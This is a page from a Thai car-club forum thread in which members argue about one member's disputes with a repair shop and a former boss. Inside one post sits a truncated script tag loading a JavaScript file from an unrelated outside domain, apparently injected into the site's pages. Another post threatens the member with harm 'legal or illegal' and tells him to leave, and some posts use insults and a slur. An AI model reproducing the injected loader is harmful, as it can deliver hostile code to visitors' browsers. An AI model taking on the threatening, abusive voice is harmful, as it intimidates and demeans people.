มันก้ไม่ต่างจากผม ที่ชอบโวยวายเอาของเล่นเป็นเด็ก แต่ต่างกันที่ผมไม่ไปทำให้ผู้ที่ไม่เกี่ยวข้องต้องเดือดร้อน

********************มีแต่ผู้ที่ไม่เกี่ยวข้อง เดือดเนื้อร้อนตัวกันเป็นแถว

ไม่ไปทำข้าวของสูญเสีย เสียหาย เพื่อจะได้อำนาจ ได้ความยิ่งใหญ่มาครอง

แล้วก็ คุณเคยถามพวกมันไหมครับว่า ที่เป็นใหญ่ทุกวันนี้ อยู่ในสังคมลำบากกันหรือเปล่า เหนื่อยไหม ?

บางทีการ การบริของแต่ละเจ้าแต่ละร้าน เห็นหลายๆคนออกมาอวยมาชมกันอย่างนั้นอย่างนี้ หลายๆร้านพูดได้เลย ที่ออกมาชมกันอะ

คนแบบที่พวกคุณบอกใช้แล้วก็งั้นๆ เขาก้เงียบไป บางคนพูดกับผม บางทีผมก็เจอกับตัวเอง แต่ไม่อยากพาดพิงเท่าไหร่ แค่พาดพิงร้านช่วงล่างผมก็รู้สึกผิดมากกละ บางร้านก็ไม่เห็นรู้สึกความต่างอะไร บางคนก้บอกแพงเกินไป แต่ร้านดีๆก้มีเจออยู่ร้านนึง จากหลายร้านที่ว่ากันมา

คนในบอด  ชอบสร้างกระแสร้านนั้นดีร้านนี้ดีแล้วก็มีสาวกออกมาชม คนที่เขาไปทำจริงๆมา หลายๆคน แล้วพบว่ามันก็งั้นๆ ได้แต่เงียบไม่กล้าพูดอะไรมากเพราะกัวจะไม่มีที่อยู่ในสังคมแห่งนี้

เพราะคนนัยนี้ถ้าเป็นร้านในคลับแล้วมีคนมาด่า ของขึ้นทันที แต่ถ้าเป้นร้านนอกคลับ นะ ร่วมด่าด้วยใส่ไม่ยั้ง ไม่ใช่ร้านพ่อแม่พี่น้องกู

แต่ถ้าเป็นร้านในคลับ หลายคนมาสร้างกะแสอวยชมว่าเทพ ดีอย่างนั้นอย่างนี้ มักจะแตะต้องไม่ได้

ถ้าผมจะไม่มีที่อยู่ ไม่มีจุดยืนก้เพราะเจอคนอย่างพวกคุณนั่นแหละครับ !!!!

ปล. อันนี้ผมจะตอบแต่เมื่อช้าวละ แต่ทู้โดนลบไป

บ่นไรวะ และใครเผา เผาไร โยงมั่วซั่วละ เลอะเทอะชิปหาย !!!
ได้รับคำขอบคุณจาก: Oyoyoo  yenjai  akkarin_c  aunja  สมชาย  ballanupong 
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

พุธ, 27 กุมภา 2013 20:36 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
 ...
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 27 กุมภา 2013 20:53 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมเฝ้าดูกระทู้นี้ด้วยความเป็นห่วงมาตั้งแต่ต้นครับ เกรงว่าทะเลาะกันไปโพสต์กันมา THANK กันไปโต้กันมา หวั่นว่างานนี้มันต้องมีคนขึ้นตัวเขียวแทนผมแน่ๆ นี่ถ้าใครขึ้นตัวเขียวแทนผมเพราะกระทู้นี้นะ คอยดูดิผมจะแช่งให้ขี้แตกเลยคอยดุละกัน<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: es330  DELL  Sak_es5442  aunja  ballanupong  focusyo  Spa  cisco 
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

พุธ, 27 กุมภา 2013 21:26 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
มีทางออกให้ครับ คุณ onlined อันดับแรกเลย ขายรถทิ้งเลยครับ แล้วนั้งรถเมย์ หรือ แท็กซี่เอา เท่านี้คุณก็ไม่ต้องซ่อมรถแล้วครับ เหตุการนี้ก็จะ

ไม่เกิดขึ้นเท่านี้รถก็จะติดน้อยลง ผมจะได้ขับรถสบายขึ้น
ได้รับคำขอบคุณจาก: aunja  ballanupong 
onlined

สมาชิกสับสน
สมาชิกสับสน

พุธ, 27 กุมภา 2013 21:51 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป

ผมขอเล่าให้ฟังละกันนะครับ ไม่ต้องห่วงครับ สบายใจได้ เรื่องงาน ทุกวันนี้ผม มาทำงาน ตจว รถไม่ติด สบายจัยกว่าหลายๆอย่าง

แต่ผมเสียดายเพื่อนฝูงที่ทำงานเก่าอย่างเดียว  จริงๆผมมีความสุขนะครับที่ทำงานเก่า สังคมเพื่อนฝูงไม่มาแสแสร้งกัน ไม่มา ใช้คำพูดแบบว่า
อยู่ในสังคมเดียวกันต้องรักกัน  ผมมีปัญหากับหัวหน้างาน เพื่อนที่ทำงานผมรู้ เข้าใจผม เอง ผมไม่ต้องพูดไรมาก ไม่มีคัยมาคอยบอกว่าทำงานที่เดียวกันต้องรักกันนะ ทุกคนเพื่อนร่วมงานผมรักกันเองครับ โดนไม่ต้องให้ใครมาบอก วันที่ผมออก

ผมยอมรับผมโดนว่าจริงๆ ผมจะเข้าห้องน้ำ ผมก็ไปเข้า จังหว่ะ user ติดปัญหา ซึ่งมันไม่ใช่เรื่องด่วนไรเลย ผมรับผิดชอบ เขาตามหาตัวผมกันไม่เจอ

ไม่ได้ไปนานเลย ผมโดน รองผู้จัดการ เรียกมาคุยหายไปไหน ผมก็บอกไปเข้าห้องน้ำครับ  เขาพูดกับผมว่าไงรู้ไหมครับ ทำไมไม่บอก !!!!

รู้ไหมว่ามีงานด่วนเข้ามา อ้าว( คิดในใจ )แล้วผมต้องบอกตลอดเหรอครับ  ??  มันมีอีกเยอะหลายเรื่อง

เพื่อนร่วมงานผมอยู่ฝ่ายเดียวกันนะครับ แต่คนละแผนก แผนกผมทำเกี่ยวกับ แก้ปัญหาให้user แผนก เพื่อนร่วมงานผม จะคอยซัพพอดอีกด้าน
แผนกผม จะมีกันอยู่ แค่ 4 คน ช 3 ญ 2  ผู้ ญ 1 เป็นผู้จัดการ  อีกคน ช1ญ1 เป็นพนักงาน เหมือนผม เขาไม่มีปัญหาอะไรกับผมเลย ผมทำงานที่ได้รับมอบหมาย พอ ไม่มีไรมาก ซึ่งผมก็ไม่ทำให้เขาผิดหวัง

ตอนออก เขายังเสียดายผมเลย อยากให้ผมคิดดูใหม่ ผอ. เขามาพูดกับผมเลย ถ้าผมต้องการอย่างนี้เขาก็ยินดี

แต่ผมไม่ชอบรองผู้จัดการ ที่เป็นผู้ ช นิสัยเขา หยุมหยิม  ไม่มีปัญหาอะไรเลยด้วยซ้ำ แต่จะมี ผู้ ช 1 คน คนนี้เขาเป็น รองผู้จัดการ (คนนี้แหละ ที่จะมีปัญหากะผม ) เพื่อนร่วมงานทุกคนพูดเป็นเสียงเดียวกัน ทุกคนรู้ดี

พักกลางวัน ผมไปกินข้าวกับเพื่อนร่วมงาน ช่วงสิ้นปี ก็ออกไปกันไกลหน่อย เพราะ งานไม่ค่อยมีแล้ว !!

ซึ่งไม่ว่าจะเป็น ผู้จัดการ หรือ ผอ. ผม เขาก็กลับเลย เลยพักเที่ยง

ซึ่งปกติ ผมจะไม่เข้าเลทเลย ขึ้นก่อนพักเที่ยงตลอด  ในขณะที่ไอตัวรองผู้ จัดการเอง มันเข้าหลัง พักเที่ยง 10-15นาทีตลอด

เพราะเคยมีเหตุการณ์นึง เงินเดือนออก พวกผมก็ไปกินร้านหรูๆหน่อย แถวนั้น แล้วมันไกล ก็เข้าเลทไป 15 นาที วันนั้นกลับมาผมก้โดนไอรองผู้จัดการคนนี้เรียกคุย เพราะมันขึ้นมาก่อนผมแล้วไม่เจอผม มันก้อบรมแล้วบอกถ้าคราวหลังไปอีกก้ให้บอก

ซึ่งสิ้นปีวันนั้น กว่าผมจะไปถึงร้าน ก้ ราว 12.30 แล้ว ผมเลยโทรบอกมัน ว่าอาจจะเลทหน่อย ผมพูดกับมันน้ำเสียงนิ่มหูมาก

รู้ไหมครับ วันนั้น ผมโดนมันด่า มันเรียกให้ผมกลับมา  หาว่าไม่มีความรับผิดชอบบ้าง ไม่รู้หน้าที่ตัวเองบ้าง

แล้ววันนั้นผมไปกินกัน 5 คน ผู้ ช ทั้งนั้น มอไซต์ 2 คัน  รู้ไหมครับ ผมยังไม่ทันได้แดรกข้าวเลย ผมต้องเดินระยะทาง 500 เมตร เพื่อมาขึ้น BTS กลับที่ทำงาน  เพื่อหวังว่าจะไม่โดนด่าไปมากกว่านี้ ผมกลับมาคนเดียวครับ !! เพราะว่า เพื่อนร่วมงานผมที่เหลือไม่ใช่ลูกน้องมัน ถึงอยู่คนละแผนกแต่ฝ่ายเดียวกัน มันไม่กล้า มีผมโดนอยู่คนเดียว 

แล้วกลับมาแล้ว ผมกลับมาก่อนมันอีกครับ กว่าผมจะมาถึงที่ทำงานก็ร่วม 13.20 น. แล้ว รู็ไหมครับผมกลับมาก่อนมัน อุตสาห์รีบกลับมา แม่งยังเรียกผมไปคุยไปด่าครับ ผมโคตรเสียความรู้สึกมาก

จริงๆมันมีเยอะครับ ผมโดนมาเยอะครับ มีอีกหลายรายละเอียดที่ผมโดน แล้วขาดหายไป แต่ขี้เกียจพิมละยาวกว่านี้

ถ้าจะมองมองได้ว่า ไอรองผู้จัดการไม่ชอบผมนะครับ แต่จริงๆผมไม่เคยทำไรให้มันไม่ีเรื่องบาดหมางใจกันนะครับ เพื่อนร่วมงานผมก็รู้ดี

เพื่อนร่วมงานมันบอกผม ไอคนนี้อะ นิสัยตุ๊ด แต่จริง มันเป็นผู้ ช นะครับ หยุ๊มหยิม บ้างอะไรบ้าง ทำตัวเนี๊ยบทุกระเบียบนิ้วบ้าง  ทำเป็นวางอำนาจบ้าง อันนี้ผมไม่ได้พูดนะครับ คนอื่นเขาพูดมา

แต่คุณพูดได้ดีนะครับ ขอบคุณครับ  เหตุการณ์เหล่านี้ถ้ามันไม่เกิดกับตัวคุณ

คุณมาพูดกระแนะกระแหน แดกดัน ขำๆได้ แต่ถ้าเจอกับตัวคุณ แล้วมันเกิดกับตัวคุณ คุณจะขำไม่ออกครับ
onlined

สมาชิกสับสน
สมาชิกสับสน

พุธ, 27 กุมภา 2013 21:53 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Cra2yLov3 พิมพ์ว่า:
มีทางออกให้ครับ คุณ onlined อันดับแรกเลย ขายรถทิ้งเลยครับ แล้วนั้งรถเมย์ หรือ แท็กซี่เอา เท่านี้คุณก็ไม่ต้องซ่อมรถแล้วครับ เหตุการนี้ก็จะ

ไม่เกิดขึ้นเท่านี้รถก็จะติดน้อยลง ผมจะได้ขับรถสบายขึ้น

ขอบคุณสำหรับทางออกครับ คุณพูดได้ดีนะครับ

ผมขายต่อให้คุณ 500,000 ถ้าคุณเอาจัดมาครับ รถปี 05 สีขาว 1.7 vtec abs airbag ติดแก๊ส วิ่งมา ประมาณ 25X,XXX โล

ถ้าทำไม่ได้ก็อย่าพูดครับ ถ้าคิดจะมาดูรถเล่นๆเพื่อจะมาเจอผม อย่ามาดู

แก้ไขล่าสุดโดย เมื่อ พุธ, 27 กุมภา 2013 21:58, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Alert

ชื่อเล่น: เลิ๊ด

เข้าร่วม: 20 สิงหา 2008
ตอบ: 618

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1516
ให้คำขอบคุณ: 70

พุธ, 27 กุมภา 2013 21:58 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ลองใช้วิจารณ์ในการอ่านและตัดสินกันนะครับ

ลองดูการตอบย้อนหลังของผู้ถูกพาดพิง

ก้อมีปัญหากับการซื้อขายมาตลอด

ปัญหามันอยู่ที่ของหรือที่คน

สังคมคงจะตัดสินกันได้
ได้รับคำขอบคุณจาก: aunja  ballanupong  wut-chiangmai  cisco 
onlined

สมาชิกสับสน
สมาชิกสับสน

พุธ, 27 กุมภา 2013 22:04 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
คนมันจะเจอ

ครังแรก เรื่องกันสาด

ครั้ง 2 เรื่องการบริการ

มองว่าเป็นที่ความผิดผม ดีเนอะครับ

ผมอะรู้ตัวนะครับว่าเป็นคนเจ้าคิดเจ้าแค้น เล่นไม่เลิก ไม่ยอมจบ 

แต่เล่นมาโยนชุ่ยๆ เป็นความผิดผมได้ ผมบอกได้คำเดียว บอดดนนี้  ใครอย่าทำตัวแตกต่าง  ไม่งั้นอยุ่ไม่ได้

ดูความคิดรองประธานบอดกันเองละกัน
Pluak_Ka

เข้าร่วม: 13 มกรา 2012
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 200
ให้คำขอบคุณ: 4
พุธ, 27 กุมภา 2013 22:36 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป

อ้างอิงจาก:

ผมไม่ชอบรองผู้จัดการ ที่เป็นผู้ ช นิสัยเขา หยุมหยิม

...

เพื่อนร่วมงานทุกคนพูดเป็นเสียงเดียวกัน ทุกคนรู้ดี

...

ซึ่งไม่ว่าจะเป็น ผู้จัดการ หรือ ผอ. ผม เขาก็กลับเลย เลยพักเที่ยง

...

ซึ่งปกติ ผมจะไม่เข้าเลทเลย ขึ้นก่อนพักเที่ยงตลอด

...

ในขณะที่ไอตัวรองผู้ จัดการเอง มันเข้าหลัง พักเที่ยง 10-15นาทีตลอด

...

เพื่อนร่วมงานผมที่เหลือไม่ใช่ลูกน้องมัน ถึงอยู่คนละแผนกแต่ฝ่ายเดียวกัน มันไม่กล้า มีผมโดนอยู่คนเดียว 

...

แล้วกลับมาแล้ว ผมกลับมาก่อนมันอีกครับ

...

แล้ว รู็ไหมครับผมกลับมาก่อนมัน อุตสาห์รีบกลับมา แม่งยังเรียกผมไปคุยไปด่าครับ

... 

ไอรองผู้จัดการไม่ชอบผมนะครับ แต่จริงๆผมไม่เคยทำไรให้มันไม่ีเรื่องบาดหมางใจกันนะครับ เพื่อนร่วมงานผมก็รู้ดี

...

เพื่อนร่วมงานมันบอกผม ไอคนนี้อะ นิสัยตุ๊ด แต่จริง มันเป็นผู้ ช นะครับ หยุ๊มหยิม บ้างอะไรบ้าง ทำตัวเนี๊ยบทุกระเบียบนิ้วบ้าง  ทำเป็นวางอำนาจบ้าง อันนี้ผมไม่ได้พูดนะครับ คนอื่นเขาพูดมา

...

คุณมาพูดกระแนะกระแหน แดกดัน ขำๆได้ แต่ถ้าเจอกับตัวคุณ แล้วมันเกิดกับตัวคุณ คุณจะขำไม่ออกครับ

ขอโทษนะคะที่หนูขอร้องแต่พี่คนอื่นๆให้หยุด คงต้องขอพี่ด้วยนะคะ "พี่กระดาษทราย" คอนเฟิมจริงๆเลย ก็เข้าใจได้นะคะเรื่องไม่ดีของตัวเองก็ไม่มีใครเห็นล่ะคะแต่ความไม่ดีของคนอื่นนี่เต็มไปหมด ก็เป็นเรื่องปกติของคนอ่ะนะคะอันนี้ก็เข้าใจกันได้ นู๋ก็เป็นค่ะแต่ก็ไม่ต้องมาเยอะในที่สาธารณะเพื่อให้ทุกคนรับรู้รำคาญใจหรอกค่ะ ส่วนเพื่อร่วมงานบอกว่าไอคนนี้นิสัยตุ๊ดพี่ก็เชื่อนะคะ ไปว่าเค้าหยุมหยิม ดูตัวเองบ้างหรือเปล่า

ขอเถิดค่ะนะคะพี่หยุดเถิดคะหยุดด้วยนะคะพอซะทีนู๋เหนพี่เยอะเยอะออกสื่อแบบนี้แล้วพี่ไม่อาย แต่นู๋อายน่ะคะ คิดว่าสงเคราะห์นู๋ละกันนะคะ

ส่วนเรื่องกระแนะกระแหนเป็นเรื่องที่พี่คิดเอาเองนะคะ นู๋ไม่ได้คิดจะกระแหนะกระแหน ก็แค่อยากให้พี่ๆคนอื่นๆเค้าเลิกต่อว่าพี่ซะที ทำไปด้วยความบริสุดใจพี่ก็ว่านู๋กระแนะกระแหนอีก ก็เอาเถอะค่ะพี่กระดาษทราย พี่จุดศูนย์กลาง ใครๆก็โคจรรอบตัวพี่นะคะ คิดอยางไรแล้วพี่ว่าใช่ก็เอาเถิด

ส่วนขำออกไม่ออกนู๋ว่าก็อยู่ที่เรานะคะเรื่องเดียวกันคิดบวกก็ขำออกแล้วคะเราก็มีแรงมีกำลังทำต่อไปได้ ส่วนคนคิดลบแต่อย่างพี่นี่จะขำไม่ออกก็แล้วแต่พี่นะคะ ขำซะบ้างก็ได้นะคะชีวิตมันจะได้ดีขึ้นบ้าง ไม่เอาละอยากจะขำไม่อยากจะขำก็เรื่องของพี่ล่ะคะ เรียนก็สูง สถาบันก็ดี มีตำแหน่ง นู๋มันไม่มีปัญญาได้เรียน เย็บผ้า รับจ้าง ขายของตัวเป็นเกรียวไม่มีตำแหน่ง ไม่มีงานดีๆทำไม่น่ามาบังอาจแนะนำพี่นะคะ อยากจะคิดยังไง อยากจะขำไม่อยากจะขำ อยากจะหยุดไม่อยากจะหยุดก็แล้วแต่พี่เถิด ทำอย่างนี้แล้วมันสะใจพอใจชีวิตมันดีขึ้นก็เอาเถิดค่ะนะพี่นะ
ได้รับคำขอบคุณจาก: aunja  basicstep 
THAM

ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

พุธ, 27 กุมภา 2013 22:38 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
สองมาตรฐาน 
YINDEE

ชื่อเล่น: ต๊อด

ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 27 กุมภา 2013 22:41 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป

ผมขอเล่าให้ฟังละกันนะครับ ไม่ต้องห่วงครับ สบายใจได้ เรื่องงาน ทุกวันนี้ผม มาทำงาน ตจว รถไม่ติด สบายจัยกว่าหลายๆอย่าง

แต่ผมเสียดายเพื่อนฝูงที่ทำงานเก่าอย่างเดียว  จริงๆผมมีความสุขนะครับที่ทำงานเก่า สังคมเพื่อนฝูงไม่มาแสแสร้งกัน ไม่มา ใช้คำพูดแบบว่า
อยู่ในสังคมเดียวกันต้องรักกัน  ผมมีปัญหากับหัวหน้างาน เพื่อนที่ทำงานผมรู้ เข้าใจผม เอง ผมไม่ต้องพูดไรมาก ไม่มีคัยมาคอยบอกว่าทำงานที่เดียวกันต้องรักกันนะ ทุกคนเพื่อนร่วมงานผมรักกันเองครับ โดนไม่ต้องให้ใครมาบอก วันที่ผมออก

ผมยอมรับผมโดนว่าจริงๆ ผมจะเข้าห้องน้ำ ผมก็ไปเข้า จังหว่ะ user ติดปัญหา ซึ่งมันไม่ใช่เรื่องด่วนไรเลย ผมรับผิดชอบ เขาตามหาตัวผมกันไม่เจอ

ไม่ได้ไปนานเลย ผมโดน รองผู้จัดการ เรียกมาคุยหายไปไหน ผมก็บอกไปเข้าห้องน้ำครับ  เขาพูดกับผมว่าไงรู้ไหมครับ ทำไมไม่บอก !!!!

รู้ไหมว่ามีงานด่วนเข้ามา อ้าว( คิดในใจ )แล้วผมต้องบอกตลอดเหรอครับ  ??  มันมีอีกเยอะหลายเรื่อง

เพื่อนร่วมงานผมอยู่ฝ่ายเดียวกันนะครับ แต่คนละแผนก แผนกผมทำเกี่ยวกับ แก้ปัญหาให้user แผนก เพื่อนร่วมงานผม จะคอยซัพพอดอีกด้าน
แผนกผม จะมีกันอยู่ แค่ 4 คน ช 3 ญ 2  ผู้ ญ 1 เป็นผู้จัดการ  อีกคน ช1ญ1 เป็นพนักงาน เหมือนผม เขาไม่มีปัญหาอะไรกับผมเลย ผมทำงานที่ได้รับมอบหมาย พอ ไม่มีไรมาก ซึ่งผมก็ไม่ทำให้เขาผิดหวัง

ตอนออก เขายังเสียดายผมเลย อยากให้ผมคิดดูใหม่ ผอ. เขามาพูดกับผมเลย ถ้าผมต้องการอย่างนี้เขาก็ยินดี

แต่ผมไม่ชอบรองผู้จัดการ ที่เป็นผู้ ช นิสัยเขา หยุมหยิม  ไม่มีปัญหาอะไรเลยด้วยซ้ำ แต่จะมี ผู้ ช 1 คน คนนี้เขาเป็น รองผู้จัดการ (คนนี้แหละ ที่จะมีปัญหากะผม ) เพื่อนร่วมงานทุกคนพูดเป็นเสียงเดียวกัน ทุกคนรู้ดี

พักกลางวัน ผมไปกินข้าวกับเพื่อนร่วมงาน ช่วงสิ้นปี ก็ออกไปกันไกลหน่อย เพราะ งานไม่ค่อยมีแล้ว !!

ซึ่งปกติ ผมจะไม่เข้าเลทเลย ขึ้นก่อนพักเที่ยงตลอด  ในขณะที่ไอตัวรองผู้ จัดการเอง มันเข้าหลัง พักเที่ยง 10-15นาทีตลอด

เพราะเคยมีเหตุการณ์นึง เงินเดือนออก พวกผมก็ไปกินร้านหรูๆหน่อย แถวนั้น แล้วมันไกล ก็เข้าเลทไป 15 นาที วันนั้นกลับมาผมก้โดนไอรองผู้จัดการคนนี้เรียกคุย เพราะมันขึ้นมาก่อนผมแล้วไม่เจอผม มันก้อบรมแล้วบอกถ้าคราวหลังไปอีกก้ให้บอก

ซึ่งสิ้นปีวันนั้น กว่าผมจะไปถึงร้าน ก้ ราว 12.30 แล้ว ผมเลยโทรบอกมัน ว่าอาจจะเลทหน่อย ผมพูดกับมันน้ำเสียงนิ่มหูมาก

รู้ไหมครับ วันนั้น ผมโดนมันด่า มันเรียกให้ผมกลับมา  หาว่าไม่มีความรับผิดชอบบ้าง ไม่รู้หน้าที่ตัวเองบ้าง

แล้ววันนั้นผมไปกินกัน 5 คน ผู้ ช ทั้งนั้น มอไซต์ 2 คัน  รู้ไหมครับ ผมยังไม่ทันได้แดรกข้าวเลย ผมต้องเดินระยะทาง 500 เมตร เพื่อมาขึ้น BTS กลับที่ทำงาน  เพื่อหวังว่าจะไม่โดนด่าไปมากกว่านี้ ผมกลับมาคนเดียวครับ !! เพราะว่า เพื่อนร่วมงานผมที่เหลือไม่ใช่ลูกน้องมัน ถึงอยู่คนละแผนกแต่ฝ่ายเดียวกัน มันไม่กล้า มีผมโดนอยู่คนเดียว 

แล้วกลับมาแล้ว ผมกลับมาก่อนมันอีกครับ กว่าผมจะมาถึงที่ทำงานก็ร่วม 13.20 น. แล้ว รู็ไหมครับผมกลับมาก่อนมัน อุตสาห์รีบกลับมา แม่งยังเรียกผมไปคุยไปด่าครับ ผมโคตรเสียความรู้สึกมาก

จริงๆมันมีเยอะครับ ผมโดนมาเยอะครับ มีอีกหลายรายละเอียดที่ผมโดน แล้วขาดหายไป แต่ขี้เกียจพิมละยาวกว่านี้

ถ้าจะมองมองได้ว่า ไอรองผู้จัดการไม่ชอบผมนะครับ แต่จริงๆผมไม่เคยทำไรให้มันไม่ีเรื่องบาดหมางใจกันนะครับ เพื่อนร่วมงานผมก็รู้ดี

แต่คุณพูดได้ดีนะครับ ขอบคุณครับ  เหตุการณ์เหล่านี้ถ้ามันไม่เกิดกับตัวคุณ

ใครเค้าอยากรู้เรื่องของมึงวะ?
สังวรในหัวสมองไว้เลยว่า "ระวังตัวไว้นะ"
อยากมีปัญหานักเดี๋ยวกูจัดให้!
ไปไหนมาไหน ถ้าเจอESแต่งหรือไม่แต่ง.....อาจเจอของจริงนะ
วันนี้หลายคนอาจรู้แล้วว่ามึงเป็นใคร? รับลองสนุกแน่
เตือนกันดีๆไม่ฟัง สิ่งที่มึงทำ คดีแพ่งนะ ทั้งหมิ่นทั้งเสียชื่อเสียงของเค้า
เอากฏหมายเล่นงานก็ได้ หรือ จะนอกกฏหมายก็ได้
ที่นี่ก็มีกฏระเบียบกฏเกณฑ์ที่เค้าปฏิบัติกันมาเป็น 10ปีแล้วมึงรับม่ได้มึงก็ไม่ต้องอยู่ รีบไสหัวมึงไปจากที่นี่ซ๊ะ อย่าให้คนอื่นต้องมาไล่เลยกูอายแทนหว่่ะ.......

ไป๊!
ได้รับคำขอบคุณจาก: aunja  ballanupong 
aunja

ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

พุธ, 27 กุมภา 2013 22:44 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ตามที่ได้อ่านและติดตามมา ผมก็ไม่อยากออกความเห็นแต่เรื่องมันก็บานปลายไปใหญ่แล้ว
มีเรื่องอะไรต่อมิอะไรเข้ามาแทรกหลายๆอย่างมันก็เลยบานปลายไปหลายเรื่อง อันไหนยุติได้ก็ทำเถิดครับ มันจะเป็นผลดีต่อตนเองและผู้อื่นอะไรพอปล่อยวางได้ก็ทำเถอะเกิดมาชาติเดียวจะอะไรมากมาย
เงินทองใช่ครับ5000 มันมีค่ามากสำหรับผมใช้ได้ทั้งเดือนเลย แต่มันเป็นเรื่องแค่นิดเดียว
ทำให้เกิดเรื่องวุ่นวายมากเลย แต่คุณก็ไม่ผิดหรอกครับที่ออกมาปกป้องสิทธิผู้บริโภค
แต่เจ้าของร้านเค้าก็มาแสดงความรับผิดชอบแล้ว คุณเองกลับไม่กล้าที่จะไปเผชิญหน้ากับความจริง
แล้วความคิดที่ว่าสะใจไว้ก่อนนี่ มันเป็นความคิดของวัยคะนอง นะครับไม่เป็นผู้ใหญ่อันนี้ไม่ดี
แต่ถ้าเป็นผม ผมจะกลับเข้าไปหาร้านครับ ผมคิดว่าผมใจนักเลงพอกล้าที่จะด่าเค้า ต้องกล้าที่จะขอโทษเค้าสิครับผมคิดว่าพี่เค้าคงไม่มีทางทำร้ายอะไรคุณแน่ๆ เค้ามีแต่เสียกะเสีย ในเมื่อเค้ากล้าออกมารับผิดชอบแล้วคุณจะให้อภัยพี่เค้าไม่ได้เลยเหรอครับ
ผมขอนะครับพอเถอะ หยุดเอาแต่อารมณ์แล้วคุยกันด้วยเหตุผลกันดีกว่าจะได้หาทางแก้ไข
เรื่องจะได้จบๆครับ ผมเองก็เพิ่งกลับเข้ามาในบอร์ดหลังจากที่ไปบวชมาได้มาเห็นแบบนี้แล้วว่าจะไม่เสนออะไรแต่มันอดไม่ได้จริงๆ ขออภัยด้วยนะครับถ้าคำพูดบางคำมันไม่ควร
ได้รับคำขอบคุณจาก: CROW  YINDEE  cisco 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 3 จาก 5
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.